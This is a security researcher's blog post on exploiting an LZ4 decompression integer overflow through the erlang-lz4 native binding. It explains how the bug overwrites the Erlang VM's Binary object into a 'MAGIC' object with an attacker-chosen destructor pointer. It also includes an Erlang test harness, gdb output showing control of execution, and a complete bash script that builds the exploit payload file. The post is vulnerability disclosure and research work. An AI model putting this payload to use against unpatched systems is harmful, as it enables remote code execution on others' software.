The Mouse Trap: A Final LZ4 Act

Killing Money

I've been getting a lot of emails, DMs, PMs, etc, congratulating me on my perseverance through the P.R. mess that has been the LZO/LZ4 bugs. Thanks for your support! But, let's be realistic, I've really just been killing money.

The amount of engineering effort that it takes to "prove" something vulnerable with an exploit is an often unnecessary add-on to a bug report. We're talking about potentially thousands of dollars in consulting hours lost due to efforts that shouldn't be required in the first place. When a bug is reported and has been fixed, that's all that should be required to say "hey, we should patch this".

I think the information security industry is failing itself, its clients, and the general Internet community when we waste time asking people to "prove it with code". If the bug report is sufficiently elaborate, then perhaps time is better spent patching and moving on with it.

I chose to "prove it with code" because first of all I don't like to lose. I'm not going to lie, a lot of it was about the selfish need to prove myself right. But, I also did it because it's my job. I released these bugs in the first place because it was the right thing to do, and as an information security consultant, my job is to try and make the Internet safer.

So, by spending thousands of dollars in lost consulting time, I'm hoping to have saved a few companies out there hundreds of thousands of dollars in remediation, forensics, and engineering time, chasing down adversaries and critical bugs that could end up costing a lot more than just money.

With that said, I've had enough of this LZ4 bug. It was fun, but I've made my point.

Writing Twice In A Write-Once Language

Attacking Erlang as a language is fun times. Why? Because in the Erlang virtual machine only allows objects to be written to once. Each variable in the Erlang language can only be written at instantiation. If you want to write to that variable again, to darn bad. The VM forbits it. Just check out the simple example below. For those that aren't familiar with Erlang, run "apt-get install erlang" on a 32bit machine (my test environment as always is x86 32bit Debian 7.5.0).

Erlang/OTP 17 [erts-6.1] [source] [async-threads:10] [hipe] [kernel-poll:false]

Eshell V6.1 (abort with ^G)

1> Variable = "Hello".

"Hello"

2> Variable.

"Hello"

3> Variable = "Lol".

** exception error: no match of right hand side value "Lol"

In the above example we can see that the erlang command line "erl" allows us to set variables, similar to Python's command line. The only difference here is that you can only do so once. Further writes to the variable require deletion of said variable. This is because in Erlang's pattern matching system, the right side of an expression must always equal the left side, unless the left side has not yet been defined.

This is amazing for pattern matching functionality, and is part of the elegance of a functional language such as Erlang, Haskell, etc.

I, personally, am a big fan of Erlang, and write a lot of code in it. I recently wrote a fuzzer for DNP3 for no other reason than to see if I could. I did. It was fun.

What isn't fun is attacking Erlang because of the nature of the language depicted above. It's not easy to mangle objects in memory when you can't alter them after the fact.

Oh, LZ4, You Slay Me^H^HErlang

But, that's where the beauty of an elegant bug like the LZ4 memory corruption flaw comes in. In order to use LZ4's optimized library, it's best to call into it from the Erlang language. To do this, a Native Implemented Function must be constructed. This is basically the Erlang equivalent to Ruby or Python bindings that connect Erlang's language to an existing shared library.

What this means is, by calling the LZ4 Erlang module from within Erlang, we are actually talking to the LZ4 C library through a binding interface. This gives us an opportunity to attack the decompression function in the same way we would for any other system.

What's even better about this simple functionality is that because the variable we define with the decompressed data is set after the data has been decompressed, we are essentially corrupting an Object in memory as it is being instantiated.

Note: The maintainer of the erlang-lz4 nif is smart and quick. They updated the erlang-lz4 package before I had a chance to get to it, so kudos to szktty. If you want to play with a vulnerable release of his code, please clone the repository at github and then check out version 0.1.1.

To start off, let's take a look at how the NIF bindings work. You can follow along here.

static ERL_NIF_TERM

nif_uncompress(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])

{

ERL_NIF_TERM ret_term;

ErlNifBinary src_bin, res_bin;

long res_size;

if (!enif_inspect_binary(env, argv[0], &src_bin) ||

!enif_get_long(env, argv[1], &res_size))

return 0;

enif_alloc_binary((size_t)res_size, &res_bin);

if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,

res_bin.size) >= 0) {

ret_term = enif_make_tuple2(env, atom_ok,

enif_make_binary(env, &res_bin));

enif_release_binary(&res_bin);

return ret_term;

} else {

enif_release_binary(&res_bin);

return enif_make_tuple2(env, atom_error, atom_uncompress_failed);

}

In the above code, we can see how the Native Implemented Function handles a call to lz4:uncompress(). The first argument is the data to be decompressed, and the second argument is the size of the buffer that the data will be decompressed into.

This decompression buffer is essentially the variable, even though no variable has yet been assigned to. Why is this? Remember that variables are set once in Erlang, so once an object has been created in memory, it's done. That's it. No more mangling. If that object must be altered in any way, a new instantiation is used - not the object that was originally created. Therefore, we have to focus on corrupting the object as it is initially decompressed.

In the above example, we can see that res_bin is the object (ErlNifBinary) that is created as the object containing the destination buffer data. The size of the destination buffer, as I mentioned a moment ago, is passed in as the second argument to lz4:uncompress(). Let's ignore for a moment that the author of the erlang-lz4 nif ignores the allocator return value and focus on the contents of enif_alloc_binary.

int enif_alloc_binary(size_t size, ErlNifBinary* bin)

{

Binary* refbin;

refbin = erts_bin_drv_alloc_fnf(size); /* BUGBUG: alloc type? */

if (refbin == NULL) {

return 0; /* The NIF must take action */

}

refbin->flags = BIN_FLAG_DRV; /* BUGBUG: Flag? */

erts_refc_init(&refbin->refc, 1);

refbin->orig_size = (SWord) size;

bin->size = size;

bin->data = (unsigned char*) refbin->orig_bytes;

bin->bin_term = THE_NON_VALUE;

bin->ref_bin = refbin;

return 1;

}

As can be seen above (or here on github), enif_alloc_binary creates a Binary object in memory, which contains the actual allocated memory buffer orig_bytes. ErlNifBinary is simply a container for the Binary object, allowing for a semblance of inheritance in C, similar to PyObject variants in Python.

So, all we really need to understand here is the layout of a Binary in memory, since that is where the decompression payload actually resides.

typedef struct binary {

ERTS_INTERNAL_BINARY_FIELDS

SWord orig_size;

char orig_bytes[1]; /* to be continued */

} Binary;

Here, we can see that the allocated object is defined almost exactly like objects in Python. For dynamic behavior, the structure's last value is an array of [1], implying that when this object is allocated in memory, any excess bytes allocated can be referenced at &orig_bytes[0], making Binary a dynamic object. This is the same methodology used in Python, and many other projects that require a semblance of classes, inheritance, or polymorphism in the C language.

Since we know that our decompression buffer will point to &orig_bytes[0], we now know that we can use the LZ4 memory corruption bug to overwrite previous fields in the Binary object with little effort. So, let's take a look at those fields.

#define ERTS_INTERNAL_BINARY_FIELDS \

UWord flags; \

erts_refc_t refc; \

ERTS_BINARY_STRUCT_ALIGNMENT

In the same file on github, just above the Binary structure definition, we see the Macro above. Including the structure variable orig_size, there are three other objects in memory before orig_bytes. The flags integer, a reference counter refc, and a padding structure on 32bit systems. All four of these variables are 32bit on a 32bit architecture, meaning that if we point our memory corruption to 16 bytes prior to the start of the decompression buffer, we can overwrite them all.

Now, you might be saying to yourself "Don, but why would we bother? Is this a crappy exploit scenario like with Ruby? Are we just corrupting the header and going home?" That's a fair question, my friend. But, remember, Erlang isn't a crappy programming language like Ruby. You can do real things in Erlang besides building Metasploit modules. It's used for real world applications. So, of course you can get more functionality out of an exploit in Erlang! It's a functional language!

Polymorphism's A Bitch

Now the great thing about the Binary object is that it's destructed at some point, just like any self respecting garbage collected virtual machine would do. This means that something, at some point, has to inspect the Binary object. Let's see how that works by looking at the NIF again.

if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,

res_bin.size) >= 0) {

ret_term = enif_make_tuple2(env, atom_ok,

enif_make_binary(env, &res_bin));

enif_release_binary(&res_bin);

return ret_term;

} else {

enif_release_binary(&res_bin);

return enif_make_tuple2(env, atom_error, atom_uncompress_failed);

Remember the code above? If LZ4 decompression returns with an error, a call is immediately made to enif_release_binary. This seems familiar! This is almost exactly how the Python bindings react to a failure in LZ4. Huh! Go figure! enif_release_binary is called whether LZ4_uncompress returns an error or not, but in the case of failure, it's called immediately. This looks more promising, so let's check it out.

void enif_release_binary(ErlNifBinary* bin)

{

if (bin->ref_bin != NULL) {

Binary* refbin = bin->ref_bin;

ASSERT(bin->bin_term == THE_NON_VALUE);

if (erts_refc_dectest(&refbin->refc, 0) == 0) {

erts_bin_free(refbin);

Back in the erl_nif.c file we can see that our corrupted Binary within the ErlNifBinary is immediately tested and passed to erts_bin_free. There are two very important things to note here

The reference count in Binary is decremented, then tested for zero
erts_bin_free is simply passed the entire Binary structure

The first point is important because this immediately tells us that refc must be overwritten with 0x00000001 in order to make a call to erts_bin_free. The second point is the most important point: erts_bin_free doesn't know anything about our ErlNifBinary. This means that this is a generic memory destruct function, which also means that due to the polymorphic behavior of the virtual machine, it must presume that the dynamically allocated data should be interpreted somehow....

ERTS_GLB_INLINE void

erts_bin_free(Binary *bp)

{

if (bp->flags & BIN_FLAG_MAGIC)

ERTS_MAGIC_BIN_DESTRUCTOR(bp)(bp);

if (bp->flags & BIN_FLAG_DRV)

erts_free(ERTS_ALC_T_DRV_BINARY, (void *) bp);

else

erts_free(ERTS_ALC_T_BINARY, (void *) bp);

}

Bingo! We've got lift off. In the erl_binary.h file we can see that erts_bin_free does indeed attempt to interpret the type of binary it is passed. If the flag variable is set to BIN_FLAG_MAGIC (0x01) then a destructor function that resides in Binary is called. Awesome! But, our Binary isn't defined as a MAGIC object! So what! Just overwrite the flag variable with 0x00000001, and you're good to go.

MAGIC Happens

All that is left now is to evaluate what the structure looks like when it is interpreted as MAGIC. Oh, it is MAGIC indeed. Let's go back to global.h to inspect the proper structure.

typedef struct {

ERTS_INTERNAL_BINARY_FIELDS

SWord orig_size;

void (*destructor)(Binary *);

char magic_bin_data[1];

} ErtsMagicBinary;

Oh, well isn't that perfect. The offset where we would normally have correctly decompressed data in a Binary structure (at the variable origbytes[1]) contains a function pointer destructor in ErtsMagicBinary.

Well isn't that convenient!

This means that our payload will essentially contain the BIN_FLAG_MAGIC value, followed by a reference count of 0x00000001, followed by 32bits of padding, followed by the original size value (any will do), followed by a function pointer. With this payload, we win.

Let's try it. Here is a simple Erlang program to call lz4:uncompress() with data from a payload file.

-module(donb).

-export([

doit/1]).

doit(File) ->

io:format("doit!~n"),

case file:read_file(File) of

{ok, B} ->

X = attack(B),

{ok, X};

{error, R} ->

{error, file:format_error(R)}

end.

attack(B) ->

R = lz4:uncompress(B, 16#00100000),

io:format("uncompress returned ~w~n", [R]).

Compile the file 'donb.erl' in Erlang using c(donb). Then, simply test it with the payload I described above. Adjustments to the Python payload from my previous blog post will do. The offset is the same.

donb@debian$ /usr/local/bin/erl -noshell -run donb doit ~/lz4/erlang.lz4 -s init stop

doit!

Segmentation fault (core dumped)

donb@debian$ gdb -q /usr/local/lib/erlang/erts-6.1/bin/beam core

Reading symbols from /usr/local/lib/erlang/erts-6.1/bin/beam...done.

[New LWP 591]

[New LWP 595]

[New LWP 596]

[New LWP 597]

[New LWP 598]

[New LWP 599]

[New LWP 600]

[New LWP 601]

[New LWP 602]

[New LWP 603]

[New LWP 604]

warning: Can't read pathname for load map: Input/output error.

[Thread debugging using libthread_db enabled]

Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".

Core was generated by `/usr/local/lib/erlang/erts-6.1/bin/beam -- -root /usr/local/lib/erlang -prognam'.

Program terminated with signal 11, Segmentation fault.

#0 0xdeadca75 in ?? ()

(gdb)

And there you have it. The elegance of polymorphism in C once again allows us to turn Binary into MAGIC and end up with Remote Code Execution with only one single integer overflow. Attacking a language that doesn't even let you write to variables multiple times is a win with LZ4 corruption.

Isn't that a beautiful thing? I think so.

Best,

Don A. Bailey

Founder / CEO

Lab Mouse Security

@InfoSecMouse

https://www.securitymouse.com/

#!/bin/bash

# Erlang LZ4 exploit (should work for all OTP vers) - donb@securitymouse.com

# Works for versions of erlang-lz4 prior to 2x

# For testing only. Do not misuse.

FILE=./erlang.lz4

append()

{

printf $1 >> $FILE

}

init()

{

rm -f $FILE

touch $FILE

}

large()

{

x="\"\\xff\" x $1"

perl -e "print $x" >> $FILE

}

append_size()

{

i=0

while [ $i -lt $1 ]; do

append $2

i=$((i+1))

done

}

# initialize the file

init

# simple literal run; no mask

append "\x0f"

# copy the fifteen bytes and embed a null ref

# the second mask must be embedded here as well

# note that the second mask starts at the first 0xff

append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0

# now we need (16843008 - 13) 0xff bytes

large 16842995

append "\xdd"

# Binary structure overwrite

# we need 76 bytes but for more than 15 we need a mask

append "\xf0\x39"

# append the ob_type

append "\x01\x00\x00\x00" # BIN_FLAG_MAGIC

append "\x01\x00\x00\x00" # refcount

append "\x00\x00\x10\x00" # orig_size

append "\xde\xad\xca\x74" # padding(?)

append "\x75\xca\xad\xde" # destructor

append "\xde\xad\xca\x79" # magic bin data

append "\xde\xad\xca\x7a" #

append "\xde\xad\xca\x75" #

append "\xde\xad\xca\x76" #

append "\xe0\x6f\x2c\x08" #

append "\x00\x00\x00\x00" #

# now finish with a bad reference

append "\xff\xff"

The Mouse Trap

Thursday, July 10, 2014

A Final LZ4 Act - Hacking Erlang

Killing Money

Writing Twice In A Write-Once Language

Oh, LZ4, You Slay Me^H^HErlang

Polymorphism's A Bitch

MAGIC Happens

No comments:

Post a Comment